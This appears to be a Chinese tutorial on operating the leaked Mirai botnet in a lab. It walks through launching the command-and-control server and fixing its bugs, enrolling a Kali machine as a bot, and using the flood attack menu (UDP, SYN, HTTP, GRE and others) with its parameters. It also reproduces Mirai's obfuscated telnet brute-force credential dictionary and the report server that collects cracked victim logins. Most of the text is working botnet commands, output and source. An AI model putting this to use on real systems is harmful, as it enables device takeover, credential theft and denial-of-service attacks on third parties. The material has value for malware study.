mirai平台的使用
本文将对mirai平台的使用进行详细说明,可能不是十分详细,目前我正在探索中…
对mirai平台安装有疑问的小伙伴,可以看一下Mirai平台的学习——搭建篇
运行mirai的cnc程序
在ubuntu中执行之前编译的cnc文件
root@ubuntu:/home/test/Desktop# cd Mirai-Source-Code/mirai
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/mirai# ./debug/cnc
Mysql DB opened
这里存在一个问题,在admin.go文件,第28行中
28 headerb, err := ioutil.ReadFile("prompt.txt")
29 if err != nil {
30 return
31 }
这里作者使用的是相对路径,启动cnc文件时需要在prompt.txt的路径下启动CNC服务端
如果不在prompt.txt路径下启动,则会找不到文件中断退出(我并没有进行具体实验)
解决办法:
(1)注释掉该段代码
(2)移动prompt.txt至debug目录
(3)直接在mirai目录启动
prompt.txt内容
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/mirai# cat prompt.txt
я люблю куриные наггетсы
检查端口对应的进程
root@ubuntu:/home/test# sudo netstat -napt|grep 23
tcp6 0 0 :::23 :::* LISTEN 44383/cnc
使用telent连接服务端
root@ubuntu:/home/test# telnet 192.168.3.34 23
Trying 192.168.3.34...
Connected to 192.168.3.34.
Escape character is '^]'.
点击回车
я люблю куриные наггетсы
пользователь: mirai-user
пароль: mirai-pass
проверив счета... |
[+] DDOS | Succesfully hijacked connection
[+] DDOS | Masking connection from utmp+wtmp...
[+] DDOS | Hiding from netstat...
[+] DDOS | Removing all traces of LD_PRELOAD...
[+] DDOS | Wiping env libc.poison.so.1
[+] DDOS | Wiping env libc.poison.so.2
[+] DDOS | Wiping env libc.poison.so.3
[+] DDOS | Wiping env libc.poison.so.4
[+] DDOS | Setting up virtual terminal...
[!] Sharing access IS prohibited!
[!] Do NOT share your credentials!
Ready
mirai-user@botnet#
这里如果telnet连上输入任意命令都直接断开,则是prompt.txt的路径出现问题。
如果遇到错误
произошла неизвестная ошибка
нажмите любую клавишу для выхода. (any key)
此时cnc端报错
dial tcp: missing port in address 127.0.0.1
你的数据库连接可能存在问题,需要在main.go中加入端口号
root@ubuntu:/home/test/Desktop# vim Mirai-Source-Code/mirai/cnc/main.go
const DatabaseAddr string = "127.0.0.1:3306"
kali靶机执行编译恶意文件
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/mirai/debug# ./mirai.dbg
root@kali:~/桌面# ./mirai.dbg
DEBUG MODE YO
[main] We are the only process on this system!
listening tun0
[main] Attempting to connect to CNC
[resolv] Got response from select
[resolv] Found IP address: 2203a8c0
Resolved cnc.test.me to 1 IPv4 addresses
[main] Resolved domain
[main] Connected to CNC. Local address = 604219584
[killer] Trying to kill port 23
[killer] Finding and killing processes holding port 23
Failed to find inode for port 23
[killer] Failed to kill port 23
[killer] Bound to tcp/23 (telnet)
[killer] Detected we are running out of `/root/桌面/mirai.dbg`
[killer] Memory scanning processes
[table] Tried to access table.11 but it is locked
Got SIGSEGV at address: 0x0
如果此处报错无法解析域名,请参考安装篇
ubuntu机器执行botcount命令查看已接入bot数量,此时kali靶机已经成为一个bot节点
mirai-user@botnet# botcount
: 1
常用攻击指令
adduser 添加用户并为其分配bot
mirai-user@botnet# adduser
Enter new username: test //输入添加用户名
Enter new password: test //输入添加用户密码
Enter wanted bot count (-1 for full net): 10 //输入分配bot数量
Max attack duration (-1 for none): 10 //输入最大攻击持续时间
exit 退出平台
? 查询参数,输入问号获取常用攻击命令
mirai-user@botnet# ?
Available attack list
udp: UDP flood
vse: Valve source engine specific flood
dns: DNS resolver flood using the targets domain, input IP is ignored
ack: ACK flood
greeth: GRE Ethernet flood
udpplain: UDP flood with less options. optimized for higher PPS
syn: SYN flood
stomp: TCP stomp flood
greip: GRE IP flood
http: HTTP flood
在参数后面跟?号,可以进一步查看参数的提示
mirai-user@botnet# udp ?
Comma delimited list of target prefixes
Ex: 192.168.0.1
Ex: 10.0.0.0/8
Ex: 8.8.8.8,127.0.0.0/29
mirai-user@botnet# udp 192.168.3.36 ?
Duration of the attack, in seconds
mirai-user@botnet# udp 192.168.3.36 10 ?
List of flags key=val seperated by spaces. Valid flags for this method are
tos: TOS field value in IP header, default is 0
ident: ID field value in IP header, default is random
ttl: TTL field in IP header, default is 255
len: Size of packet data, default is 512 bytes
rand: Randomize packet data content, default is 1 (yes)
df: Set the Dont-Fragment bit in IP header, default is 0 (no)
sport: Source port, default is random
dport: Destination port, default is random
source: Source IP address, 255.255.255.255 for random
Value of 65535 for a flag denotes random (for ports, etc)
Ex: seq=0
Ex: sport=0 dport=65535
用户通过CNC执行攻击指令后,bot会收到CNC下达攻击指令并对目标发起进攻
[main] Connected to CNC. Local address = -335435584
[main] Received 14 bytes from CNC
[attack] Starting attack...
[main] Received 18 bytes from CNC
[attack] Starting attack...
[main] Received 18 bytes from CNC
[attack] Starting attack...
[main] Received 19 bytes from CNC
[attack] Starting attack...
同时,在数据库中可以查到攻击记录。
具体攻击代码,主要在mirai//bot/attack_*.c中
注意:进行stomp攻击时,攻击失败可能是(1)持续时间参数设置太小;(2)攻击端口没有开放;(3)debug版里while有一个break,只攻击一次就跳出来了。
telnet爆破攻击
Mirai在进行telnet攻击中,主要是通过内置的字典进行爆破,成功后将信息返回
// Set up passwords
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511
add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9); // root vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8); // root admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7); // admin admin
add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6); // root 888888
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5); // root xmhdipc
add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5); // root default
add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5); // root juantech
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5); // root 123456
add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5); // root 54321
add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5); // support support
add_auth_entry("\x50\x4D\x4D\x56", "", 4); // root (none)
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4); // admin password
add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4); // root root
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4); // root 12345
add_auth_entry("\x57\x51\x47\x50", "\x57\x51\x47\x50", 3); // user user
add_auth_entry("\x43\x46\x4F\x4B\x4C", "", 3); // admin (none)
add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51", 3); // root pass
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16", 3); // admin admin1234
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x13\x13\x13", 3); // root 1111
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x51\x4F\x41\x43\x46\x4F\x4B\x4C", 3); // admin smcadmin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13", 2); // admin 1111
add_auth_entry("\x50\x4D\x4D\x56", "\x14\x14\x14\x14\x14\x14", 2); // root 666666
add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51\x55\x4D\x50\x46", 2); // root password
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16", 2); // root 1234
add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11", 1); // root klv123
add_auth_entry("\x63\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x4F\x47\x4B\x4C\x51\x4F", 1); // Administrator admin
add_auth_entry("\x51\x47\x50\x54\x4B\x41\x47", "\x51\x47\x50\x54\x4B\x41\x47", 1); // service service
add_auth_entry("\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", "\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", 1); // supervisor supervisor
add_auth_entry("\x45\x57\x47\x51\x56", "\x45\x57\x47\x51\x56", 1); // guest guest
add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
add_auth_entry("\x43\x46\x4F\x4B\x4C\x13", "\x52\x43\x51\x51\x55\x4D\x50\x46", 1); // admin1 password
add_auth_entry("\x43\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x13\x10\x11\x16", 1); // administrator 1234
add_auth_entry("\x14\x14\x14\x14\x14\x14", "\x14\x14\x14\x14\x14\x14", 1); // 666666 666666
add_auth_entry("\x1A\x1A\x1A\x1A\x1A\x1A", "\x1A\x1A\x1A\x1A\x1A\x1A", 1); // 888888 888888
add_auth_entry("\x57\x40\x4C\x56", "\x57\x40\x4C\x56", 1); // ubnt ubnt
add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11\x16", 1); // root klv1234
add_auth_entry("\x50\x4D\x4D\x56", "\x78\x56\x47\x17\x10\x13", 1); // root Zte521
add_auth_entry("\x50\x4D\x4D\x56", "\x4A\x4B\x11\x17\x13\x1A", 1); // root hi3518
add_auth_entry("\x50\x4D\x4D\x56", "\x48\x54\x40\x58\x46", 1); // root jvbzd
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x4C\x49\x4D", 4); // root anko
add_auth_entry("\x50\x4D\x4D\x56", "\x58\x4E\x5A\x5A\x0C", 1); // root zlxx.
add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x54\x4B\x58\x5A\x54", 1); // root 7ujMko0vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // root 7ujMko0admin
add_auth_entry("\x50\x4D\x4D\x56", "\x51\x5B\x51\x56\x47\x4F", 1); // root system
add_auth_entry("\x50\x4D\x4D\x56", "\x4B\x49\x55\x40", 1); // root ikwb
add_auth_entry("\x50\x4D\x4D\x56", "\x46\x50\x47\x43\x4F\x40\x4D\x5A", 1); // root dreambox
add_auth_entry("\x50\x4D\x4D\x56", "\x57\x51\x47\x50", 1); // root user
add_auth_entry("\x50\x4D\x4D\x56", "\x50\x47\x43\x4E\x56\x47\x49", 1); // root realtek
add_auth_entry("\x50\x4D\x4D\x56", "\x12\x12\x12\x12\x12\x12\x12\x12", 1); // root 00000000
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13\x13\x13\x13", 1); // admin 1111111
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16", 1); // admin 1234
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17", 1); // admin 12345
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x17\x16\x11\x10\x13", 1); // admin 54321
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17\x14", 1); // admin 123456
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // admin 7ujMko0admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x16\x11\x10\x13", 1); // admin 1234
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51", 1); // admin pass
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x4F\x47\x4B\x4C\x51\x4F", 1); // admin meinsm
add_auth_entry("\x56\x47\x41\x4A", "\x56\x47\x41\x4A", 1); // tech tech
add_auth_entry("\x4F\x4D\x56\x4A\x47\x50", "\x44\x57\x41\x49\x47\x50", 1); // mother fucker
在report服务器中运行./scanListen,默认监听48101端口,该服务将接收bot爆破出的结果。
cd /Mirai/mirai/debug && ./scanListen
scanner成功爆破出结果时,会通过resolv模块寻找report服务器所在IP,然后通过report模块发送受害者的信息